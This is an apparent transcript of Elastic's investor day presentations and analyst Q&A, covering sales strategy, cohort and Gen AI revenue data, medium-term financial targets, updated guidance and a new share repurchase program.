We've made additional investments in specialists in the sales organization. For example, 18 months ago, we built out a team of Gen AI specialists to work with our account teams because we saw this opportunity exploding. We charged our sellers with going to their customers and finding out who's building Gen AI applications, what vector databases are they testing, what were they trying to accomplish. Once they get to those decision makers, we bring in these specialists. They're having a huge impact. We've also expanded the specialist team for Security. We've had for a long time technical security specialists, but we added sales security specialists to help us get in front of more opportunities, get us into more at-bats. You saw the technology that Santosh and his team demonstrated. We win when customers evaluate Elastic. We're like, we want them to go. We want them to test us.

We want them to look at other competitors because we win. We're just going after more at-bats. We've built out a value engineering team that builds ROI models and executive messaging to help our sales teams close large transformational deals, oftentimes helping customers migrate off of legacy incumbents to Elastic. On the low end, we have a large number of low-dollar renewals. We built out low-cost renewal managers to run a repeatable process who are driving our renewal rates up. The other area I want to share with you that we've driven transformation is around our sales plays. We went from a fragmented model to three focused sales plays. We treat these like products. They're designed with intent. They're measured with rigor. They're scaled with discipline. Each of them has training for our sellers, content, collateral, models to work when we engage with customers.

The three plays are Victors in V ectors. This is our Gen AI play. The second is Race to Displace. This is where we're going after legacy incumbents. The third is Free to Paid, just as described. This isn't a new motion for Elastic. We've converted free users to paid for a long time. We've got more structured in how we do that. We've given our sellers insights into who's using free Elastic, how they're using it. We're giving them tools so they can go to their customers to show the value of going to paid Elastic. These transformations that we've driven are driving results. I'm really happy with my team. I'm proud of my leaders, how they've leaned in. What we're seeing is better performance. We're driving better consistency, predictability. We've had four straight quarters of strong sales results, which you've heard on our earnings announcements.

I'll also share with you that we've seen improved productivity. Last year, our productivity per AE, per account executive, was up high single digits after previously declining. We saw meaningful improvement in sales efficiency, meaning that we're getting a better return on our investment in the sales organization. Because we have the right foundation and we now have an investable model, we've been thoughtfully and systematically adding sales capacity to drive our growth for the future. Some other signals of our success: we grew the number of accounts greater than $100,000 ACV by 14% last year, and we grew the average per customer in that cohort. We saw that continue in Q1. I'm very excited to share what we've seen in growth of our million-dollar-plus customers. We grew 27% last year. We continue to grow at that pace in Q1. All of that, I'm happy about.

I'm excited about what we've accomplished. I'm really excited about the future, and I'll show you why. Ash Kulkarni mentioned to you that over 50% of the Fortune 500 are paid Elastic customers. When I widen the aperture a little wider as a Global 2000, it's only 42%. That means we have 58% to go and convert to Elastic customers, and I know we can help them. This is part of why we now have dedicated territories, dedicated teams focusing on getting better at landing to go after new logos. If you just put that aside and look at our existing customers, what this shows you is that only 19% of them use us for more than one solution, but that 19% represents 75% of our sales-led ARR.

We have a massive opportunity to expand in our existing customers, and that's why we have territories and entire teams focused on expand, going deeper with their customers. They have fewer accounts per AE to go deeper, learn about their problems, show them how we can solve their problems, go to new buying centers to expand. I want to show you a customer journey with Elastic. This happens to be a U.S.-headquartered retailer that has physical stores around the country, a large web presence. They started with Elastic a few years ago with Observability on self-managed, and you can see that their ARR for us was flat for two years. Then they chose us for search in the cloud, and their ARR doubled.

Shortly after that, we went through our segmentation exercise, and the enterprise AE that covers this customer was able to spend more time with them, better understand what they're trying to accomplish, learn about their challenges. We started helping them create the next-generation e-commerce experience, and they chose us for vector search and our generative AI capability. They also started using our AI Assistant in Observability, and their ARR doubled. We see opportunity for this to continue to grow as their new e-commerce p latform goes into full production.

It's an example of customers going from self-managed to cloud, one solution to two, and the potential and opportunity we have when customers are using us for regular search, keyword search, going to vector search. I'll close with this. We've made a lot of improvements. I'm really proud of my team and where we are operating at a high level, but we're continuing to drive improvements in the team. We're now investing in capacity for the future in order to capture the AI opportunity we have at hand. What I can tell you is, it's a great time to be at Elastic. Thank you. I will now turn it over to our Chief Financial Officer, Navam.

Navam Welihinda
CFO, Elastic

Welcome, everyone. I'm Navam. Thank you, Mark. Great to see you today. You've heard about Agent Builder. You've heard about streams. You've heard about workflows. A ton of innovation we're driving at the company. It's truly a dynamic and exciting time to be here. I want to start off by summarizing, before I get into the finance stuff, what you heard from my colleagues about the Elastic advantage. First and foremost, we are a company with a massive amount of platform innovation. Customers use us where data has gravity, be it on the self-managed side or the cloud side. We are driving innovation in both. You've heard about that from my colleagues, Ken, Steve, and Santosh, about the features and functionality we're driving into both cloud and self-managed platforms. Second, you just heard from Mark. Our GTM strategy is gaining momentum.

Mark talked about the revamp strategy that we have in place. It's been in place for over a year now. We are adding customers efficiently, and we are expanding them. Third, you heard from Ash about our unparalleled advantage in unstructured data, relevance, and context engineering. This is our defensible moat. Because of this advantage, we were made for the Gen AI era, and we're ready to take on this Gen AI opportunity ahead of us. In my section, I want to talk about how we turn these advantages into what you're all here for: revenue growth, attractive margins, and growing free cash flow. Before we do that, I'm going to run through this pretty quickly to baseline. I want to talk about the progress over the last five years.

We have built a solid base of revenue of over $1.5 billion over the last 12 months, of trailing 12 months. This revenue comes from, and at the same time, we've been increasing our revenue in double digits. This revenue comes from three sources. Bottom of the graph is our sales-led subscription revenue. Middle is the monthly cloud business, which is self-serve. The top of the graph is our services business. If you look at our professional services business, this is in support of our sales-led subscription revenue. We sell it to help our sales-led subscription customers grow. It's about lowering barriers to adoption. It's about shortening time to value. It supports our sales-led business. The monthly cloud business consists mostly of SMB customers. In the past, this grew with high SMB spend. Around 2022, you saw that SMB spend was moderating, and that's the dynamics we're facing today.

Over the past few years, we've matured as a company, and we've focused mainly on larger strategic accounts and high-propensity commercial accounts, as Mark talked about. We serve this segment through a sales-led motion. This sales-led motion leads to sales-led subscription revenue, and let's take a look at that in more detail. We've maintained a very strong growth rate in sales-led subscription revenue. In 2025, we grew 20%, and this sales-led subscription revenue is becoming a bigger and bigger percentage of our total revenue. In 2025, this revenue line reached 81% of our total. This is the segment we spend most of our time and effort on and our investment in. We tell our sales teams, and we incentivize our sales teams to go get customers in this segment, either in self-managed or cloud, and we incentivize them to meet our customers where they are.

As you think about our business and as we think about our business, sales-led subscription revenue is the primary barometer of how we measure our success. Not just cloud, not just self-managed, sales-led subscription revenue in aggregate, the both of them is how we measure success for us. We delivered these strong revenue lines along with rapidly advancing our operating profit and free cash flow margins. On the graph on the left, you'll see our non-GAAP operating profit margins. You'll see that we reached break-even in 2022. Since that point, consistently adding operating profit, ending at 15% in 2025. FCF follows a similar trajectory. Shown in the chart on the right, we've reached 19% in adjusted free cash flow in 2025. What you're seeing here is basically the inherent leverage in our model.

We have high product gross margins, and we have leverage on our sales and marketing and G&A line items. That's causing us to be able to deliver these strong operating profit and strong free cash flow lines. We expect this to continue. With improving profit margins, with improving free cash flow margins and strong revenue growth, we're continuing to see increases and progress towards the Rule of 40. FY 2023, we had Rule of 40 of 29%, and we've progressively grown that to 36% by FY 2025. We're continuing to make progress there. Rule of 40 is how we think about balancing how we invest in growth while at the same time delivering free cash flow. That's the state of the business over the past five years. Very strong metrics. A few slides ago, I talked about the importance of sales-led subscription revenue.

These next few slides and sections are about diving deeper into that revenue line item. I want to talk about sales-led subscription momentum and how we can support this and make it a durable business. Let's take a look at some data. Mark mentioned this. Our GTM strategy is anchored on our highest value customers, while at the same time, our product team is delivering continuous innovation, leading the market in Search, Observability, and Security. This tech is resonating with these customers. More and more customers are joining our $100,000 customer ranks and $1 million customer ranks. The $100,000 customer rank that you see here on the left accounts for the majority of our sales-led revenue. It's 87% of the total. These customer counts are consistently increasing. At the same time, if you look at our average customer value, that's growing over time as well.

Let's look at how we're able to drive this growing average customer value. On the left-hand side, we have a powerful model of landing new customers and expanding them, growing our $100,000 and $1 million ranks. New customers in the beginning drive a smaller amount of ARR, but that ARR compounds over time with expansion. Our platform basically is meant to adapt and scale with customers bringing in data, helping them become more efficient. This includes some of the largest customers in the world. The flexibility and scalability of our platform is the key differentiator for these customers and the reason we succeed with these customers. Customer expansion is driven by them bringing in more and more data into our platform, creating more workloads, and then upgrading to higher subscription tiers to get premium features, and then also adopting multiple solutions as they go deeper into our platform.

All of these dynamics result in a high sales-led net retention rate. In Q1, we saw a sales-led net retention rate of 113% TTM. This was driven by the strong expansion that I talked about and the stable growth retention. We've built a durable customer base, and there's great expansion opportunity from both new customers and existing customers. We have still a long way to go. From the new customer side, when you look at the G2K customer count that Mark showed you this graph before, we still have a lot of white space. 58% of the G2K customer base still remain to become Elastic customers. That's a lot of white space for us to go get. The existing customer side has a lot of opportunity as well. On the left-hand side, I think you've seen this graph before. Mark talked about this. 19% of our customers have more than one solution, two solutions, or three solutions, and they contribute to 75% of our sales-led ARR.

We see much higher ARR per customer after they adopt multiple solutions. On the right-hand side graph, you'll see that the median for a three-solution customer is 12 x that of a single-solution customer. This is our opportunity. As we make inroads with existing customers, as I said, we expect workloads to grow and Ken highlighted how we've architected our solution to make things more efficient for our customers and incentivize them to bring more into our system and bring more into our platform and also adopt more and more of our solutions. This is our repeatable playbook for years to come. There's a lot more growth left for us. That's the expansion dynamics of our sales-led subscription revenue.

I want to talk about what gives us confidence in the future. I want to take a deeper look at our customer cohorts. What are you seeing here? This chart displays our sales-led subscription revenue customer cohorts from FY 2013 to FY 2025. Each band and color shade represents a cohort of customers based on when they were first an Elastic customer of ours. If we draw a dotted line from the end of FY 2020, you'll get to see that there's a good balance of growth from longstanding customers and newer customers. Customers before 2020 contribute to, there's almost a 60/40 split, contributed to 61% of our recent growth, and customers since 2020 represented 49%. This is a good balanced growth dynamic from our customer cohorts.

The cohort data also revealed three very important takeaways, which I'll go into, related to the durability of our cohorts, the resiliency of our cohorts, and the Gen AI tailwinds that we're beginning to see over the past couple of years. Let's dive a little bit more next into these cohort data and talk about these three key takeaways. The first takeaway is that these cohorts show remarkable durability. This is a chart of our most mature cohorts. Even these cohorts are still expanding. Though some of these customers have been with us a while, and normally you would expect to see more stable ARR rates from these customers, they're similar to our new customers. They're bringing in more data, and they're very active. The FY 2013 through 2020 customer group, as a group, grew their sales-led ARR by 10% last year.

Even these customers continue to be remarkably active, just like our new customers. This expansion durability supports our growth algorithm. The second takeaway is that we see remarkable resiliency from our customer base. You all remember calendar 2022. This was a challenging time for software. I was there as well. Similar to most of the industry, everybody faced budget constraints, and everyone was forced to prioritize optimization on their spend. During that time, our customers were no different. They faced the same dynamics. We worked with our customers to reduce their spend and encourage them to adopt new features of ours, like frozen tier storage, for example, which will help them become more efficient. The aggregate result of all that is a slower expansion rate in that period. During that period, we also did not see an elevated churn rate.

We saw a slower expansion rate, but we didn't see quite an elevated churn rate. Once those headwinds passed, the growth trajectory continued. I think that was a great data point that demonstrates, one, how resilient our customers are, and two, how important our customers think our platform is. How much value they see in our platform and the amount of innovation we put into our platform, they basically are making our software essential technology in their workflows. This is great news. The third takeaway relates to the tailwinds we are beginning to see with Gen AI. Now, this graph shows the year one to year two ARR expansion of each cohort. This is the first year expansion of each cohort over the past six years. FY 2024 is showing a greater year one to year two growth than any of the cohorts in the recent past.

If you draw that dotted line that you see, that dotted line over there, that represents the 2019 through FY 2023 cohort average. That's 20%. FY 2024 is twice that size, 42%. This is a significant data point because that's the first cohort that has seen a full year of Gen AI impact in their first year growth. In fact, if you look at this FY 2024 cohort in a little bit more detail, you'll see that 11% of this cohort adopted some kind of Gen AI functionality. This minority grew more than 60% or contributed to more than 60% of the cohort's net expansion rate. This is an excellent outcome. This is the data point that we have of the accelerated revenue growth we see when customers adopt Gen AI use cases.

When you look at it more broadly, and you look at our aggregate ARR in FY 2025 split between customers who use Gen AI and split between customers who do not use Gen AI, there is a clear difference in expansion rate that comes up. Our customers have a 6%, or we see a 6% tailwind from our customers if they are using Gen AI. Gen AI is driving acceleration for us right now. While we're seeing all these promising results related to Gen AI, it's important to remember we're still in the very early innings of customer adoption. We've seen strong adoption among our $100,000 customers with more than 20% using Gen AI features. We've made strong progress moving from 4% to 21%. There's still a fair amount of room for our customers to start using Gen AI and grow into the ranks of the $100,000 category.

Even among the customers who are in the $100,000 category, they're still in their infancy in the number of apps that are Gen AI enabled. There are going to be more and more apps that they build, which will then get them further into their journey into Gen AI and create more maturity and more tailwind for us. All right. Now I've shown you a lot of our cohort data, our expansion data, and you've digested how our sales-led customer behavior is. You've seen about, I've talked about how durable things are and how resilient our customer base is and how we're starting to benefit from the Gen AI functionality and from the Gen AI tailwinds. Next, and I know this is something you've been looking for, how do you put this all together? How do you think about this from a midterm framework? Let's go there next.

We view sales-led subscription revenue, both self-managed and cloud, to be the midterm growth engine of our company. This growth comes from two components. The first component is the continued execution of our land and expand model on the core Search, Observability, and Security use cases on the customer base that we have and the new customers that we're going to add in the G2K . We discussed the durability of our customers. We discussed the white space we have in the remaining customers where we have to get. We expect a 15%+ growth rate by the medium term, not counting the benefits of Gen AI for our sales-led subscription revenue.

The second component, and this is still in the early stages, is related to the continued penetration of generative AI among our sales-led customers, both in terms of the number of $100,000 customers we can get, as well as the penetration and maturity into those $100,000 customer accounts. We expect a 5%+ tailwind gradually as generative AI increases among our customer base. We expect this core execution plus tailwind to result in a 20%+ target growth rate in the medium term. As always, we will operate with operating expense discipline, and we intend the total revenue and adjusted free cash flow margin to result in a 40%+ Rule of 40 target. Let's take a look at this in a little bit more detail. As I mentioned, sales-led subscription revenue target growth rate is 20%+.

From those two components of the base growth rate and the generative AI tailwinds, that revenue line, the sales-led subscription revenue line, is expected to be 85% - 90% of our total revenue. Both non-GAAP operating margin and adjusted free cash flow are expected to exceed 20%+, driven by our disciplined OpEx and operating leverage, disciplined OpEx management and operating leverage. Finally, we expect to maintain net dilution rate below 2.5% as we remain disciplined in adding headcount while at the same time being competitive in the talent market. When you look at our operating margin improvements in the past, you'll see the leverage that we have, which gives us confidence in reaching this 20%+ target. FY 2026 I talked to you about was an investment year for us.

After those catch-up investments, we expect to decrease sales and marketing and G&A expenses as a percentage of total and get our operating margins above 20% through the combination of our disciplined OpEx on sales and marketing and G&A and also our gross margin improvements. Our product gross margins are already above 80%. You can see that in our subscription revenue line. That's grown, but there's more growth to have in, or there's more increases to have in our subscription margin line. The combination of subscription margins, which results in higher gross margins and leverage in our sales and marketing and G&A, will allow us to get to 20%+. You can see the progress we've made in sales and marketing and G&A over the past five years as well. We're confident about hitting this 20%+ target.

Now, given that we're further along in the year, and you've all digested our medium-term framework, I'd like to touch on our current fiscal year in the context of aligning to this framework. In the beginning of the fiscal year, we detailed there were certain macro conditions that were emerging. It was very uncertain. We didn't know what the impact of consumption and commitment plans were, what patterns could be. We built some of that into our guidance that we provided in the beginning of the year. We essentially carried most of that through in the first quarter, after the first quarter. Since then, now that we're further along in the year and further along in the quarter, we've gained greater visibility into the demand environment. We feel good about the commitments we're seeing. There's still headwinds, like you've all read the news, the government shutdown. That's still ongoing.

We believe we're better positioned than what we had originally anticipated. As such, I'm updating my second quarter and full-year guidance to the following. You may remember that in Q2, we guided $415 million- $417 million. At the time, we had raised this by, we were $6 million above consensus at a 14% year-over-year growth rate, and 2026 was $1.679 billion - $1.689 billion, also a 14% rate with a 16% op margin target. I'm updating this now to a Q2 total revenue target or guidance of $417 million- $419 million, an additional $2 million above the $6 million that we've already increased. Also in FY 2026, we're updating the range from $1.697 billion - $1.703 billion, which is a 15% year-over-year growth rate. In addition to this, we expect our non-GAAP operating margins in FY 2026 to be a quarter point higher at 16.25%.

Moving on to discuss our balance sheet. We have a strong balance sheet driven by a growing cash balance that's fed by a growing free cash flow line. With our increasing amounts of cash, we have three primary capital allocation priorities. Our first priority is to continue to invest in the business and our platform to position us to win in Gen AI. It's a massive Gen AI opportunity ahead of us, and we need to drive durable growth. The second priority, and this is apt because of the Gen AI announcement we just did, we will evaluate and pursue acquisitions that further our strategy, similar to the ones that we just did. We'll do so with strict financial discipline. These traditionally have been tech and talent tech-ins to enhance our Search platform or Observability and Security platform. This will be our second priority with a second capital allocation priority.

Finally, this is new, we will begin returning capital to shareholders through a share repurchase program in order to partially offset dilution. We will do ongoing share repurchases unless more attractive acquisition opportunities become available to us. As part of this acquisition, as part of this capital allocation strategy, I'm pleased to announce that the board has authorized $500 million for an initial program. We expect to use more than 50% of the authorized amount in fiscal 2026. Going forward, we expect to return 50% of our free cash flow, as I mentioned, through share repurchases, unless more attractive acquisition opportunities arise that require us to use some more cash. We are incredibly excited about the opportunity ahead. We have a business supported by a strong land and expand motion. Generative AI presents a dynamic and exciting opportunity for us here at Elastic. Our platform was made for this moment.

Our model supports tremendous leverage, which allows us to grow revenue and grow our margins, expanding to Rule of 40 and above. Thank you very much for being here. I want to welcome back Eric, back to the stage.

Eric Prengel
Global VP of Finance, Elastic

OK. Thank you, everyone. We're going to have a Q&A session in a second. This is going to set up the chairs. We're going to get all the people who presented back on stage. The way the Q&A is going to work is raise your hand. I'll call on people. When you ask your question, please state your name as well as the firm that you work for. With that, I think we've almost got the chairs on stage. I'll call the team to come back up, please. These guys work fast. By the way, Claire and Chantal, I'll come bring microphones. Go for it. Go ahead. Ittai, you want to go first?

Ittai Kidron
Managing Director and Senior Equity Research Analyst, Oppenheimer

Thank you, Ittai Kidron from Oppenheimer. Thanks for the presentation today. Very helpful. A clarification for you, Navam. And a question for you, Ash. The clarification for you, Navam, when you talked about the Gen AI contribution to your long-term model, five points, you said gradually growing into it. Does that mean that in the early years here, it will not be 5%, meaning your targeted growth is under 20%? In time, we'll get to 20% just on that. Ash, you made a very compelling presentation today. You and your entire team around the technology, the differentiation. I always come away very impressed with the technology. When I look at the competitive space, whether it be a Datadog or a Dynatrace, or the security companies like a CrowdStrike, they are all growing north of 20% for quite some time.

Help me understand what is it in the model that is so difficult in translating the technology into reality of dollars. I understand that there's a big GenAI opportunity ahead. You can always say, talk to me two years from now. A lot of the advantages have already existed for the last three, four years. What is it that's been missing in making that? How are you addressing that gap, perceived gap between the capability and the reality of what the numbers are?

Ash Kulkarni
CEO, Elastic

Why don't I take the question, the second question first? Maybe that'll lead nicely for Navam to answer the first. The most important thing to understand is what is the role that customers use us for in an enterprise? It's always been around unstructured data. That's been the primary problem that Elastic was always used to solve. We got into search first, and that was the core use case. Search, in the early days, just did not have the same market size and opportunity as maybe structured data and opportunities around it, or even Observability and Security. That led us to go into other areas where unstructured data was a core problem. We got into Observability. We got into Security.

We were methodically building out all of the capabilities that we needed to be a very strong player, a very compelling player, starting with our core strengths, starting with log analytics for Observability and starting with SIEM for Security. We've been on this journey. Keep in mind that when it came to search, that was, in some ways, the smallest part of the business. What has changed for us in every way possible is that unstructured data has become more important than ever before. Our core search business is seeing more interest than we've ever seen in the past. That market, that solution area, is today our fastest growing solution area. That wasn't the case in the past. That's number one.

Second, even when it came to Observability and Security, in the past, although we had the best backend data store to deal with Observability signals, to deal with Security signals, we didn't have anything that we could completely and conclusively come forward with and say, this is why we can solve the problem better, faster, and in a more efficient manner. AI has been that unlock, even in Observability, even in Security. When you see the demos today, if you paid attention to the demos today, what you saw was stuff that matters to Security and SRE practitioners that was not possible before, and more importantly, that others aren't able to do even today. All of that comes from that really amazing advantage that we have from AI.

To me, this is definitely an opportunity for us to continue to improve upon our growth rate, accelerate everything that we are doing, and get well past the 20% mark. That's the goal. That's the history of how we got here. That's the reason why I'm so excited, because effectively, what was always our core strength, Ittai, has now become what the market cares most about.

Navam Welihinda
CFO, Elastic

Let me take that first question, Ittai. I'm glad you asked it. Here's the way you should think about our model. I hope I gave you enough data on the cohorts and the expansion rates and given you enough cuts to show that, look, 15% is a baseline. We expect that to be there, just based on continued core execution on things we have without anything coming from the background and helping us along. That's just the core execution. That's something we want to be solid about, right? Beyond that, there's the tailwind of, so it's 15% +, and then there's 5%+ . AI is just a very dynamic market. It's going to be progressive as we go into the midterm, which midterm for me is from the end of the year, roughly three-ish years is the way I think about it.

This year, we've guided to 15% for the full year. Sales-led subscription revenue is generally about two points higher than that, right? From there is the tailwind growing to a 20% + target rate, which the framework suggests in the midterm period. That's how I would think about sort of a growing tailwind on the sales-led line, which will end in the 20% + rate in the framework model that I just talked about. Just to be clear, those AI tailwinds are happening now. We're confident about those AI tailwinds continuing. The timing, it's a dynamic market. The timing of exactly quarter by quarter mapping it out is a difficult thing to do.

Koji Ikeda
Director of Enterprise Software Equity Research, Bank of America

Koji Ikeda from Bank of America. Thanks for doing this. Great presentation, guys. Wanted to ask a question maybe related to Ittai's question about budget unlock with the customers. It sounds like the generative AI opportunity is tremendous for you guys. Technology is fantastic. I mean, you talk with any customer out there. Elastic is just very, very well known in the end market. What does it take for the customers to spend more with you guys? Is it just more strategic shots on goal? Mr. Dodds, this question may be directed mostly towards you about what are you doing within the sales organization to really drive more spend over to you guys?

Ash Kulkarni
CEO, Elastic

Maybe I'll touch upon it, and I'll definitely want Mark to elaborate. In a lot of ways, Koji, as you said, the market opportunity has always been there. Part of it has been just the opportunity around AI making search more and more important, which has been a big part of why you see this enthusiasm. You see the cohort data clearly showing how AI is contributing. The other part of this is, you know, when we looked at our segmentation model in the past, there was definite inefficiency in the fact that our sellers weren't really specializing. Our sellers were hybrid sellers, if you will. A lot of the work, a lot of the hard work that we went through at the beginning of FY 2025 in terms of the work that Mark did was to make sure that we could go deeper.

We could go in a more intentional way into accounts, into enterprise accounts to capture a bigger share of the wallet. These deals take time. When you're able to convert a customer over from an incumbent SIEM platform and consolidate them onto Elastic, those deals tend to be very big. One example was the GSA announcement that we made in the public sector. I think it was a quarter ago.

Mark Dodds
Chief Revenue Officer, Elastic

It was in June.

Ash Kulkarni
CEO, Elastic

In June, that is the perfect kind of example of the kinds of opportunities we are now able to go after with the kind of work that Mark's team has done. Mark.

Mark Dodds
Chief Revenue Officer, Elastic

Yeah, I think you said it well. As I mentioned earlier, we've reduced the number of accounts per AE so that they can go deeper with those customers and cross-sell into new buying centers. We're seeing that gaining traction, building pipeline, and getting us into new business. We're also focusing on net new logos with territories and entire teams focused on that. As I mentioned, we're adding more sales capacity. We're getting more at-bats to grow our business.

Mike Cikos
Managing Director of Equity Research, Needham

Hey, thanks again for doing the analyst interview of Mike Cikos with Needham. Appreciate all the information on the cohorts, the financial model. On the 15 points baseline that we're talking to, it'd be helpful to get a better understanding of the different use cases that are giving you guys that confidence. Right? I know we're bold up on search. We're seeing it at the conference here. I think it was probably five, maybe six consecutive quarters where we were talking about search AI budgets are accelerating. We're now at least a quarter or two since we've gotten that last data point. We're seeing the growth rates. Can you just help explain that dynamic? The second, but more of a tech question here. With the Elastic Inference Service, I understand that you guys have the models now being served up on the GPUs.

Was it on the customer to actually, it was on them to get the chips and then put the model on the chips? What did the customer have to do for that inferencing angle that the EIS offering is now unlocking that you guys are announcing today?

Thank you.

Navam Welihinda
CFO, Elastic

That one first, then I'll do.

Ash Kulkarni
CEO, Elastic

Why don't I ask Ken to answer the second one?

Ken Exner
Chief Product Officer, Elastic

I'll answer the second question, which is, previously, if a customer wanted to use our embedding models or re-ranker, they would run them on an ML node within our stack, which would be on a CPU-based architecture. If they wanted to use GPUs, they could, but they would have to direct it towards some other service that either they would run or somewhere else. With the Inference Service, we are providing a fully managed API-accessible inferencing capability that's running on GPUs. It's initially supporting ELSER and embedding models. We're going to expand that to cover re-rankers and the Gen AI models as well. We will be expanding the models that we host on the Inference Service, and it'll all be on GPUs.

Navam Welihinda
CFO, Elastic

I'll take that first question you asked. First of all, I think you've got to think about the core platform growth. There's more and more data coming into the platform, and you've seen the data behind the net retention rates that are 113% and stable. There's data behind each of the cohorts over a long period of time that support continuing that team's growth rate without much tailwinds. That's the first point I'd make that outside of search acceleration, outside of all the unlocks that you're seeing on search, just the core platform increase is going to be sustained at 15% +, just based on the net retention rates and the cohort data that we see.

In addition to that, when you think about all the great platform announcements or the search and Observability announcements that we made today, that's driving differentiation to allow us to take more market share on that TAM that's still expanding. Observability and Security businesses are still very large TAMs, and there's still a long way to go there. I think that our product differentiation now just grew. That's what gives us confidence on that 15% +. It's just driven by that core platform and the amount of data that's coming into the platform and supported by all the cohort data and the net expansion data that you just saw, along with all the product announcements that we talked about in Security and Observability outside of search.

Sanjit Singh
Executive Director, Morgan Stanley

My congrats on all the great data and from the presentation as well. Ash, I got a really clear view today of where the company is going, how they're going to win, why they're going to win. One of the most popular questions I get from investors is, why did growth get so low to begin with? Navam, in your presentation, I think speaks to part of that, which is maybe around some of the optimization activity. There are some good market changes you guys are making. Is there anything else that could explain the deceleration in growth that we've seen over the last couple of years? Was there headwinds in your Security business or your Observability business that you're now working through?

I think if we put those pieces together, it makes much easier to underwrite the kind of where we're going on a 15%+ growth basis in Gen AI. Any sort of comments there in the Head of Product?

Ash Kulkarni
CEO, Elastic

Yeah, let me address that and then ask Navam to also jump onto it. Fundamentally, I think there was a chart. I can't remember the exact slide number, but there was a chart that Navam showed that broke down the three components within our revenue. There's sales-led subscription revenue, there is the monthly cloud business, and then there are services. If you look carefully at those three components, they really tell the story. Because monthly cloud, which is our SMB business, was a significantly larger component and faster growing component of the business if you went back four or five years. That clearly in the last three years has been roughly flat. That's not something that just we are seeing, but across the board, like we see SMB spending hasn't really come back the way enterprise and other spending has come back.

Services, professional services, we have been very clear about that this is not something that we believe is something that we want to grow at the same rate of the business. That's not, it's not the most strategic part of what we are trying to do. We are a platform company. We are a product platform company. The subscription revenue growth that we are trying to drive through the sales-led motion, that's what we care most about. Services is just an enabler. What we really have been laser-focused on in the last three years is making sure that we get that growing and thriving and continuing to accelerate. That's what the effort has been in.

That's the reason why we had the, you know, so apart from it, by solution mix or any other cut, we don't see any issues in terms of competing, winning in the market, continuing to take share. We feel incredibly confident about Observability. We feel incredibly confident about Security. Matter of fact, we've been beneficiaries when it comes to taking share from incumbents. It is this dynamic of monthly and the rest of the business. If you take out the monthly, then that's what we are really focused on. Internally, that's the thing that I care about. Over time, that's going to be a bigger and bigger percentage of our revenue. The rest is, frankly, not going to be what should matter to investors.

Sanjit Singh
Executive Director, Morgan Stanley

Understood.

Navam Welihinda
CFO, Elastic

Nothing more to add. I think the intent of providing those two charts is to give you the data behind it. Ash summarized it clearly, which is the changes in the SMB dynamic, which is partially, not partially, the main reason for the deceleration that you're seeing in those years. The second chart, which is showing the durability of our sales and subscription revenue growth rate for multiple years, I mean, we talked about multiple quarters in the last earnings call. You look back, it's been many, many years of strong growth. What we're saying now is that we maintain that durability, 15% + on the baseline, just with bread and butter stuff that we're doing now without much Gen AI. The Gen AI tailwinds, which we're seeing now, get us to beyond that. There's even the potential to breach 20%.

The Gen AI tailwinds of 5% are just the math we see on the cohorts that we compare. There's some data that has a higher tailwind than 5%.

Sanjit Singh
Executive Director, Morgan Stanley

Understood. On the Security business, kind of following Ittai's question, are investors underwriting like market share gains, displacements? I mean, you guys are a product company, Security becoming more data-driven, compliant, all that. Are you guys, and this probably might be a Mark question, do you feel like you have the relationships with the Security ecosystem to drive what are pretty formidable competitors in the SIEM space in particular? I'd just love to get your perspective on that.

Mark Dodds
Chief Revenue Officer, Elastic

Yeah, I'll comment, and maybe Santosh, if you want to add. What we see in the market is that many customers are ready to and want to replace their legacy Security platforms. They're evaluating Elastic, and they put us through our paces. We love that because when customers evaluate us in detail and they see the innovation that we're driving, they see Attack Discovery, Automatic Import, we're winning a high percentage of the time, and we're winning large deals. That's why we have a program around Race to Displace. We're finding a lot of success there, and we're excited about that opportunity.

Eric Prengel
Global VP of Finance, Elastic

Could you just say your name and firm when you're on the microphone?

Rob Owens
Managing Director and Senior Research Analyst, Piper

Sure. Rob Owens from Piper. Hi, guys. Ash, you do have a history in the Security universe if we go back almost a decade now at this point.

Ash Kulkarni
CEO, Elastic

I'm old.

Rob Owens
Managing Director and Senior Research Analyst, Piper

It has never been an efficacy game relative to endpoint. While you're showing well in the scores, a lot of the independent scoring, is EDR critical to your success as we think about that convergence of what was XDR, but next-generation SIEM in your view?

Ash Kulkarni
CEO, Elastic

In my view, it's going to be another vector for growth, Rob. I think that the great thing about endpoint Telemetry is it's voluminous, and you can't get away from it. You have to have something on your endpoints to make sure that you have that threat vector covered. Exactly for that reason, the most important thing that we solved a few years ago, and we solved it right, was to make sure that we made it easy for people to get our endpoints deployed, our agents deployed on their endpoints. The way we did that is by basically incorporating all of that functionality directly into the same agent that does the SIEM collection, that does the collection of data for SIEM. You're already deploying that agent, and once you have it, then we go to them and say, hey, it's the easy button. Just turn it on.

Now, you're absolutely right that efficacy isn't the only thing that matters, that there is more that's required. People need to put you through their paces. People need to see that you can have the one single dashboard that they can use for doing all their detections and remediation and so on. Having that data-centric approach and being the SIEM gives us the opportunity to start to talk to the SOC and basically say, you're already trusting us for doing all your detections across all threat vectors, not just endpoint, but across everything, because that's what happens in a SIEM. Everything ends up in a SIEM eventually. If you are trusting us for that, why don't you try out the endpoint functionality? It's been this expand play. All through this time, we have been making our endpoint product better and better, adding not just efficacy capabilities, but also management capabilities.

How do we easily deploy? How do we do rolling upgrades? All of those things that, for other vendors, have even caused blue screens of death, as you know. Those things are important to get right, and we've been working hard on them. Over time, I expect this to be a bigger and bigger and more and more interesting area for us for expansion. We're just getting started on it.

Howard Ma
Director and Equity Research Analyst of Software Sector, Guggenheim Securities

Great. Thank you. Howard Ma with Guggenheim Securities. Thanks for a very informative presentation, as well as the balanced profit and growth framework, which is what I want to ask about. If you look at the top line going from about 15% today to, assuming you achieve the aspirational target of 20% +, that's quite positive. If you look at the free cash flow margin, I know you guys didn't give a discrete guide for this year. I think you might have said, Navam, on the earnings call, it's like high teens. Going from high teens to 20% is not that much expansion.

I wonder, is that because of conservatism, or are you building in investments specifically on the monthly pay-go side because you have to drive the product-led motion still and educating your customers that Elastic is the best unified data platform for unstructured data and driving consolidation versus a siloed approach today? I would say really those are kind of the barriers today. The question is how much investments are needed to overcome those potential challenges. Thank you.

Ash Kulkarni
CEO, Elastic

Before Navam answers the question on the free cash flow model and so on, I just want to clarify the inherent leverage in the model and want to make sure that people understand that one of the advantages of having a single platform on which we have Search, Observability, Security, all of these solutions built is that our cost of engineering and our cost of building this platform is incredibly efficient. We don't have to build three different management consoles. We don't have to build three different ways to manage users and user profiles and so on. There is tremendous leverage that we get by having one single platform. That applies also to our monthly cloud business. It is important to understand that our monthly cloud business isn't an expense drag on the business. It is something that tempers the top line because it's been flat.

